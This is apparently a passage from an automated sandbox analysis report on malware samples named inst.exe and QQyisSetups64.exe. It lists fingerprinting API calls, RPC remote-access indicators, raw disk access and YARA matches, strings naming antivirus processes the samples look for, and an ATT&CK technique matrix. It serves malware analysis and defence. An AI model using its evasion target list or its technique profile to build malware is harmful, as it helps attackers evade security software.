                          Source: C:\Users\user\Downloads\inst.exeCode function: 15_2_00A765C0 cpuid 15_2_00A765C0
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: _memset,_memset,_memset,gethostname,gethostbyname,inet_ntoa,_strcat_s,_strcat_s,inet_ntoa,_strcat_s,_strcat_s,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetLastInputInfo,GetTickCount,wsprintfW,wsprintfW,MultiByteToWideChar,MultiByteToWideChar,GetSystemInfo,wsprintfW,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrlenW,GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,wsprintfW,GetCurrentProcessId,OpenProcess,K32GetProcessImageFileNameW,CloseHandle,GetTickCount,__time64,__localtime64,wsprintfW,GetLocaleInfoW,GetSystemDirectoryW,GetCurrentHwProfileW,6_2_03785430
                          Source: C:\Users\user\Downloads\inst.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,15_2_00B07AB2
                          Source: C:\Users\user\Downloads\inst.exeCode function: GetLocaleInfoA,15_2_00B1C813
                          Source: C:\Users\user\Downloads\inst.exeCode function: GetLocaleInfoA,GetLocaleInfoA,GetACP,15_2_00B07569
                          Source: C:\Users\user\Downloads\inst.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,15_2_00B07AEE
                          Source: C:\Users\user\Downloads\inst.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,15_2_00B07A4B
                          Source: C:\Users\user\Downloads\inst.exeCode function: GetLocaleInfoA,15_2_6C6A6445
                          Source: C:\Users\user\Downloads\inst.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,15_2_6C6A607E
                          Source: C:\Users\user\Downloads\inst.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,15_2_6C6A6017
                          Source: C:\Users\user\Downloads\inst.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,15_2_6C6A60BA
                          Source: C:\Users\user\Downloads\inst.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,15_2_6C6A7C17
                          Source: C:\Users\user\Downloads\inst.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,GetLocaleInfoA,15_2_6C6A7AD8
                          Source: C:\Users\user\Downloads\inst.exeCode function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW,15_2_6C6A7AA4
                          Source: C:\Users\user\Downloads\inst.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,15_2_6C69B79C
                          Source: C:\Users\user\Downloads\inst.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,15_2_6C6A4EFF
                          Source: C:\Users\user\Downloads\inst.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,15_2_6C694697
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Users\user\AppData\Local\Temp\{4CFE9941-4698-4699-A247-0D1E422E339F}.tmp VolumeInformationJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Users\user\AppData\Local\Temp\{A161C916-3730-49ee-83E0-3AC161379AC4}.tmp VolumeInformationJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Users\user\AppData\Local\Temp\{939E192B-95AD-4c61-BAEB-66F162E25721}.tmp VolumeInformationJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeCode function: 3_2_100113E9 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,3_2_100113E9
                          Source: C:\Users\user\Downloads\inst.exeCode function: 15_2_00AC8A46 _memset,GetUserNameW,__wcsicoll,_memset,GetModuleFileNameW,StrStrIW,15_2_00AC8A46
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: 6_2_03795D22 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,6_2_03795D22
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: 6_2_03786A70 wsprintfW,GetCurrentProcessId,wsprintfW,_memset,GetVersionExW,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,wsprintfW,6_2_03786A70
                          Source: QQyisSetups64.exeBinary or memory string: vsserv.exe
                          Source: QQyisSetups64.exeBinary or memory string: avcenter.exe
                          Source: QQyisSetups64.exeBinary or memory string: cfp.exe
                          Source: inst.exeBinary or memory string: SuperKiller.exe
                          Source: QQyisSetups64.exeBinary or memory string: rtvscan.exe
                          Source: QQyisSetups64.exeBinary or memory string: TMBMSRV.exe
                          Source: inst.exeBinary or memory string: SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360Safe.exe
                          Source: inst.exeBinary or memory string: \SuperKiller.exe
                          Source: QQyisSetups64.exeBinary or memory string: avgwdsvc.exe
                          Source: inst.exeBinary or memory string: SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe
                          Source: inst.exeBinary or memory string: firstaid\superkiller.exe
                          Source: inst.exe, 00000010.00000002.1461047607.0000000001107000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ?SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe
                          Source: inst.exeBinary or memory string: Software\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe
                          Source: QQyisSetups64.exeBinary or memory string: K7TSecurity.exe
                          Source: QQyisSetups64.exeBinary or memory string: acs.exe
                          Source: QQyisSetups64.exeBinary or memory string: kxetray.exe
                          Source: QQyisSetups64.exeBinary or memory string: KSafeTray.exe
                          Source: QQyisSetups64.exeBinary or memory string: avp.exe
                          Source: inst.exe, inst.exe, 00000010.00000002.1461047607.0000000001107000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 360safe.exe
                          Source: QQyisSetups64.exeBinary or memory string: 360Safe.exe
                          Source: inst.exeBinary or memory string: 360tray.exe
                          Source: QQyisSetups64.exeBinary or memory string: ashDisp.exe
                          Source: QQyisSetups64.exeBinary or memory string: 360Tray.exe
                          Source: QQyisSetups64.exeBinary or memory string: AYAgent.aye
                          Source: QQyisSetups64.exeBinary or memory string: RavMonD.exe
                          Source: QQyisSetups64.exeBinary or memory string: QUHLPSVC.EXE
                          Source: QQyisSetups64.exeBinary or memory string: Mcshield.exe

                          Stealing of Sensitive Information

                          barindex
                          Source: Yara matchFile source: Process Memory Space: QQyisSetups64.exe PID: 7892, type: MEMORYSTR
                          Source: C:\Users\user\Downloads\inst.exeDevice IO: \Device\Harddisk0\DR0Jump to behavior
                          Source: C:\Users\user\Downloads\inst.exeDevice IO: \Device\Harddisk0\DR0Jump to behavior

                          Remote Access Functionality

                          barindex
                          Source: Yara matchFile source: Process Memory Space: QQyisSetups64.exe PID: 7892, type: MEMORYSTR
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeCode function: 3_2_1000EE80 RpcStringBindingComposeW,RpcBindingFromStringBindingW,RpcBindingSetAuthInfoExA,RpcStringFreeW,3_2_1000EE80
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeCode function: 3_2_0286EE57 RpcStringBindingComposeW,RpcBindingFromStringBindingW,RpcBindingSetAuthInfoExA,RpcStringFreeW,3_2_0286EE57
                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity InformationAcquire Infrastructure1
                          Replication Through Removable Media
                          2
                          Windows Management Instrumentation
                          1
                          DLL Side-Loading
                          1
                          DLL Side-Loading
                          1
                          Disable or Modify Tools
                          141
                          Input Capture
                          2
                          System Time Discovery
                          Remote Services1
                          Archive Collected Data
                          2
                          Ingress Tool Transfer
                          Exfiltration Over Other Network Medium1
                          System Shutdown/Reboot
                          CredentialsDomainsDefault Accounts3
                          Native API
                          1
                          Bootkit
                          1
                          Access Token Manipulation
                          1
                          Deobfuscate/Decode Files or Information
                          LSASS Memory11
                          Peripheral Device Discovery
                          Remote Desktop Protocol1
                          Screen Capture
                          11
                          Encrypted Channel
                          Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain Accounts2
                          Command and Scripting Interpreter
                          Logon Script (Windows)223
                          Process Injection
                          2
                          Obfuscated Files or Information
                          Security Account Manager1
                          Account Discovery
                          SMB/Windows Admin Shares141
                          Input Capture
                          1
                          Non-Standard Port
                          Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal Accounts1
                          PowerShell
                          Login HookLogin Hook1
                          Software Packing
                          NTDS4
                          File and Directory Discovery
                          Distributed Component Object Model2
                          Clipboard Data
                          2
                          Non-Application Layer Protocol
                          Traffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                          DLL Side-Loading
                          LSA Secrets246
                          System Information Discovery
                          SSHKeylogging13
                          Application Layer Protocol
                          Scheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
                          Masquerading
                          Cached Domain Credentials1
                          Query Registry
                          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                          Modify Registry
                          DCSync451
                          Security Software Discovery
                          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job141
                          Virtualization/Sandbox Evasion
                          Proc Filesystem141
                          Virtualization/Sandbox Evasion
                          Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                          Access Token Manipulation
                          /etc/passwd and /etc/shadow13
                          Process Discovery
                          Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron223
                          Process Injection
                          Network Sniffing11
                          Application Window Discovery
                          Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                          Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                          Bootkit
                          Input Capture1
                          System Owner/User Discovery
                          Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                          Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
                          Indicator Removal
                          Keylogging1
                          System Network Configuration Discovery
                          Taint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
